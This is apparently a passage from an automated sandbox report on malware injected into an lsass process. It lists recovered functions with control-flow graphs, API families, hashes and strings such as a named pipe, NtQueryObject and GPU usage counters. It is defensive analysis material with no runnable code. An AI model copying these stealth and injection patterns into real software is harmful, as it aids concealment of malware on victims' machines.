                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: AllocHeap
                                                          • String ID:
                                                          • API String ID: 4292702814-0
                                                          • Opcode ID: 065a3c227d1033dd624f9406cc348b017554f0f94b7651207c823ad3d34cd8d2
                                                          • Instruction ID: e1e6e0ac71898aeab69aabadab1461bc0982668d0686ebd3bc5e150eb7b2f4ab
                                                          • Opcode Fuzzy Hash: 065a3c227d1033dd624f9406cc348b017554f0f94b7651207c823ad3d34cd8d2
                                                          • Instruction Fuzzy Hash: E3F0B464302381C1FF99A7A299CC3ED12805F99B84F0E5433CFAA963C3ED2CC5AC8210

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 258 202c0ae2ff0-202c0ae3069 260 202c0ae306f-202c0ae3075 258->260 261 202c0ae3384-202c0ae33a7 258->261 260->261 262 202c0ae307b-202c0ae307e 260->262 262->261 263 202c0ae3084-202c0ae3087 262->263 263->261 264 202c0ae308d-202c0ae309d GetModuleHandleA 263->264 265 202c0ae30b1 264->265 266 202c0ae309f-202c0ae30af GetProcAddress 264->266 267 202c0ae30b4-202c0ae30d2 265->267 266->267 267->261 269 202c0ae30d8-202c0ae30f7 StrCmpNIW 267->269 269->261 270 202c0ae30fd-202c0ae3101 269->270 270->261 271 202c0ae3107-202c0ae3111 270->271 271->261 272 202c0ae3117-202c0ae311e 271->272 272->261 273 202c0ae3124-202c0ae3137 272->273 274 202c0ae3139-202c0ae3145 273->274 275 202c0ae3147 273->275 276 202c0ae314a-202c0ae314e 274->276 275->276 277 202c0ae3150-202c0ae315c 276->277 278 202c0ae315e 276->278 279 202c0ae3161-202c0ae316b 277->279 278->279 280 202c0ae3251-202c0ae3255 279->280 281 202c0ae3171-202c0ae3174 279->281 284 202c0ae325b-202c0ae325e 280->284 285 202c0ae3376-202c0ae337e 280->285 282 202c0ae3186-202c0ae3190 281->282 283 202c0ae3176-202c0ae3183 call 202c0ae1a30 281->283 287 202c0ae31c4-202c0ae31ce 282->287 288 202c0ae3192-202c0ae319f 282->288 283->282 289 202c0ae3260-202c0ae326c call 202c0ae1a30 284->289 290 202c0ae326f-202c0ae3279 284->290 285->261 285->273 295 202c0ae31d0-202c0ae31dd 287->295 296 202c0ae31fe-202c0ae3201 287->296 288->287 294 202c0ae31a1-202c0ae31ae 288->294 289->290 291 202c0ae327b-202c0ae3288 290->291 292 202c0ae32a9-202c0ae32ac 290->292 291->292 301 202c0ae328a-202c0ae3297 291->301 302 202c0ae32ae-202c0ae32b7 call 202c0ae1cc4 292->302 303 202c0ae32b9-202c0ae32c6 lstrlenW 292->303 304 202c0ae31b1-202c0ae31b7 294->304 295->296 305 202c0ae31df-202c0ae31ec 295->305 299 202c0ae320f-202c0ae321c lstrlenW 296->299 300 202c0ae3203-202c0ae320d call 202c0ae1cc4 296->300 308 202c0ae321e-202c0ae322d call 202c0ae1cfc 299->308 309 202c0ae322f-202c0ae3241 call 202c0ae3f88 299->309 300->299 312 202c0ae3247-202c0ae324c 300->312 307 202c0ae329a-202c0ae32a0 301->307 302->303 317 202c0ae32ee-202c0ae32f9 302->317 313 202c0ae32c8-202c0ae32d7 call 202c0ae1cfc 303->313 314 202c0ae32d9-202c0ae32e3 call 202c0ae3f88 303->314 311 202c0ae31bd-202c0ae31c2 304->311 304->312 315 202c0ae31ef-202c0ae31f5 305->315 307->317 318 202c0ae32a2-202c0ae32a7 307->318 308->309 308->312 309->312 322 202c0ae32e6-202c0ae32e8 309->322 311->287 311->304 312->322 313->314 313->317 314->322 315->312 325 202c0ae31f7-202c0ae31fc 315->325 327 202c0ae3370-202c0ae3374 317->327 328 202c0ae32fb-202c0ae32ff 317->328 318->292 318->307 322->285 322->317 325->296 325->315 327->285 332 202c0ae3301-202c0ae3305 328->332 333 202c0ae3307-202c0ae3321 call 202c0af3a40 328->333 332->333 334 202c0ae3324-202c0ae3327 332->334 333->334 337 202c0ae334a-202c0ae334d 334->337 338 202c0ae3329-202c0ae3347 call 202c0af3a40 334->338 337->327 340 202c0ae334f-202c0ae336d call 202c0af3a40 337->340 338->337 340->327
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction ID: a5aa8d518733a65e72782ac89f22c94750b1b62739d14810ddb664aeb1ab3f90
                                                          • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction Fuzzy Hash: 54B17B23218790C2FB688F26D48C7ADA3A4FB54B84F42501BEFA957796DE35CC68C340
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction ID: 1fd1398fcb60db0fd12b5702c5cec2ec559b6403bb8f7bfd8953d4e0478874f3
                                                          • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction Fuzzy Hash: 3A313872205B80CAEB648F60E8983EE6364F784744F45412BDB4E47B9AEF39C6588710
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction ID: bdf96c80047f6ea7879b7296cb0b1e392bde7b83cf83d084ea18cef059749d5e
                                                          • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction Fuzzy Hash: 88413B37214B80D6EB60CB25E88879E73A4F788798F510217EB9D47B9ADF39C559CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID:
                                                          • API String ID: 1164774033-0
                                                          • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction ID: 6cd45a926ae4f196c66121e0907c686aba8d01625abc602bf4e60f2acf2c76ac
                                                          • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction Fuzzy Hash: 21A1C7227047C1C9FF20DB75A8CC3AD6BA1E781794F164117DFE92B69ADA38C469C700

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction ID: 0346aae0ca31cfc5446ed893382cb8ac7576f5295399881bb2bb3007a05736cd
                                                          • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction Fuzzy Hash: E7515872600B84DAE724DF62E88C35EB7A1F788F99F464126DB8907759EF39C0598700

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                          • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                          • API String ID: 740688525-1880043860
                                                          • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction ID: c9050c799cc8b24d351ecbc0e2456b50b0823dadf38651cf09021ade24b1e00f
                                                          • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction Fuzzy Hash: 7451B022701794D1FA249B66A88C7AD2290FB48BB0F4A07279FBD473D2EF38D55D8640

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Running Time
                                                          • API String ID: 1943346504-1805530042
                                                          • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction ID: da826e7b8d6e7ca4cec740dbf7bba15f3c3c47d0d85c22e92d3f34e745d80f34
                                                          • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction Fuzzy Hash: 2E31F723604B81D6F721DF22A88C75DA3A0F788BC6F464627EF9943766DF38C4698340

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Utilization Percentage
                                                          • API String ID: 1943346504-3507739905
                                                          • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction ID: 863d4c81c0bb7533973f4be5efafb84a7b862018384b7cbbeae244933c129245
                                                          • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction Fuzzy Hash: 6C316B23614B81CAFB14DF26A8CC75DA3E0F784F95F4641279F9A43726EF38D8598600
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000003.2182941443.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_3_202c0ab0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction ID: c8547640cb286afa299405946a8124958e51512830d2469bcbb3e32d4079da4f
                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction Fuzzy Hash: 9DD15932604B80CAFB609F6994CC3AD77A0F755798F12021BEB8957B9BDB38C599C704

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 374 202c0aea22c-202c0aea294 call 202c0aeb144 377 202c0aea29a-202c0aea29d 374->377 378 202c0aea6f5-202c0aea6fb call 202c0aec388 374->378 377->378 380 202c0aea2a3-202c0aea2a9 377->380 381 202c0aea2af-202c0aea2b3 380->381 382 202c0aea378-202c0aea38a 380->382 381->382 386 202c0aea2b9-202c0aea2c4 381->386 384 202c0aea390-202c0aea394 382->384 385 202c0aea645-202c0aea649 382->385 384->385 387 202c0aea39a-202c0aea3a5 384->387 389 202c0aea64b-202c0aea652 385->389 390 202c0aea682-202c0aea68c call 202c0ae9324 385->390 386->382 388 202c0aea2ca-202c0aea2cf 386->388 387->385 391 202c0aea3ab-202c0aea3af 387->391 388->382 392 202c0aea2d5-202c0aea2df call 202c0ae9324 388->392 389->378 393 202c0aea658-202c0aea67d call 202c0aea6fc 389->393 390->378 403 202c0aea68e-202c0aea6ad call 202c0ae8070 390->403 395 202c0aea575-202c0aea581 391->395 396 202c0aea3b5-202c0aea3f0 call 202c0ae9704 391->396 392->403 407 202c0aea2e5-202c0aea310 call 202c0ae9324 * 2 call 202c0ae9a0c 392->407 393->390 395->390 400 202c0aea587-202c0aea58b 395->400 396->395 411 202c0aea3f6-202c0aea3ff 396->411 404 202c0aea58d-202c0aea599 call 202c0ae99cc 400->404 405 202c0aea59b-202c0aea5a3 400->405 404->405 418 202c0aea5bc-202c0aea5c4 404->418 405->390 410 202c0aea5a9-202c0aea5b6 call 202c0ae95a4 405->410 441 202c0aea330-202c0aea33a call 202c0ae9324 407->441 442 202c0aea312-202c0aea316 407->442 410->390 410->418 416 202c0aea403-202c0aea435 411->416 420 202c0aea43b-202c0aea447 416->420 421 202c0aea568-202c0aea56f 416->421 423 202c0aea5ca-202c0aea5ce 418->423 424 202c0aea6d8-202c0aea6f4 call 202c0ae9324 * 2 call 202c0aec2f4 418->424 420->421 425 202c0aea44d-202c0aea46c 420->425 421->395 421->416 427 202c0aea5d0-202c0aea5df call 202c0ae99cc 423->427 428 202c0aea5e1 423->428 424->378 429 202c0aea558-202c0aea55d 425->429 430 202c0aea472-202c0aea4af call 202c0ae99e0 * 2 425->430 437 202c0aea5e3-202c0aea5ed call 202c0aeb1dc 427->437 428->437 429->421 457 202c0aea4e2-202c0aea4e5 430->457 437->390 449 202c0aea5f3-202c0aea643 call 202c0ae9634 call 202c0ae9838 437->449 441->382 456 202c0aea33c-202c0aea35c call 202c0ae9324 * 2 call 202c0aeb1dc 441->456 442->441 448 202c0aea318-202c0aea323 442->448 448->441 453 202c0aea325-202c0aea32a 448->453 449->390 453->378 453->441 479 202c0aea35e-202c0aea368 call 202c0aeb2cc 456->479 480 202c0aea373 456->480 460 202c0aea4b1-202c0aea4d7 call 202c0ae99e0 call 202c0aea96c 457->460 461 202c0aea4e7-202c0aea4ee 457->461 475 202c0aea4f9-202c0aea556 call 202c0aea158 460->475 476 202c0aea4d9-202c0aea4dc 460->476 465 202c0aea4f0-202c0aea4f4 461->465 466 202c0aea55f 461->466 465->430 470 202c0aea564 466->470 470->421 475->470 476->457 484 202c0aea36e-202c0aea6d1 call 202c0ae8f84 call 202c0aead28 call 202c0ae9178 479->484 485 202c0aea6d2-202c0aea6d7 call 202c0aec2f4 479->485 480->382 484->485 485->424
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction ID: a8d0328bd7ace5f1ad4107d746fc22be05e34ce5d332c004736b100ae6b30142
                                                          • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction Fuzzy Hash: 5DD17972604B80CAFB20DB65948C39D77A0F766788F160217EBE957B9BDB34D4A9C700

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 495 202c0ae104c-202c0ae10b9 RegQueryInfoKeyW 496 202c0ae10bf-202c0ae10c9 495->496 497 202c0ae11b5-202c0ae11d0 495->497 496->497 498 202c0ae10cf-202c0ae111f RegEnumValueW 496->498 499 202c0ae11a5-202c0ae11af 498->499 500 202c0ae1125-202c0ae112a 498->500 499->497 499->498 500->499 501 202c0ae112c-202c0ae1135 500->501 502 202c0ae1147-202c0ae114c 501->502 503 202c0ae1137 501->503 505 202c0ae114e-202c0ae1193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 502->505 506 202c0ae1199-202c0ae11a3 502->506 504 202c0ae113b-202c0ae113f 503->504 504->499 507 202c0ae1141-202c0ae1145 504->507 505->506 506->499 507->502 507->504
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction ID: 12129625d553530f9360fb6b3d3905575b46989a33bec7f90b4e235278d54632
                                                          • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction Fuzzy Hash: 90417173214B84DAF760CF21E48879E77A1F388B98F45821ADB8907758DF39D459CB40

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                          • String ID: \\.\pipe\$nya-childproc
                                                          • API String ID: 166002920-3933612297
                                                          • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                          • Instruction ID: d33db17a6a3834e504e60fa23096d5bdff287254edc6079e3c59764f330a6822
                                                          • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                          • Instruction Fuzzy Hash: 8C113732614B40C2F710CB21F49C75E7760F389BD4F954216EBA946AA9CF3DC148CB44
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000003.2182941443.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_3_202c0ab0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: 22b18ffbf591b9dc89f632c02f4c28f659f76ce7d48a6708a250f2a210a7424c
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: 9F81D530600741CAFB64AB69A8CD39D26D0AB86780F07612BDF09477D7DBB9CA4E8710
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: 90553422afb251b2333bb3ab516386814491dc1bf468d3212e086abda9a642d1
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: 6981E4716103C1C6FA54EB6598CD3AD6290AB85784F574117ABE8473D7EF38CA6E8700
                                                          APIs
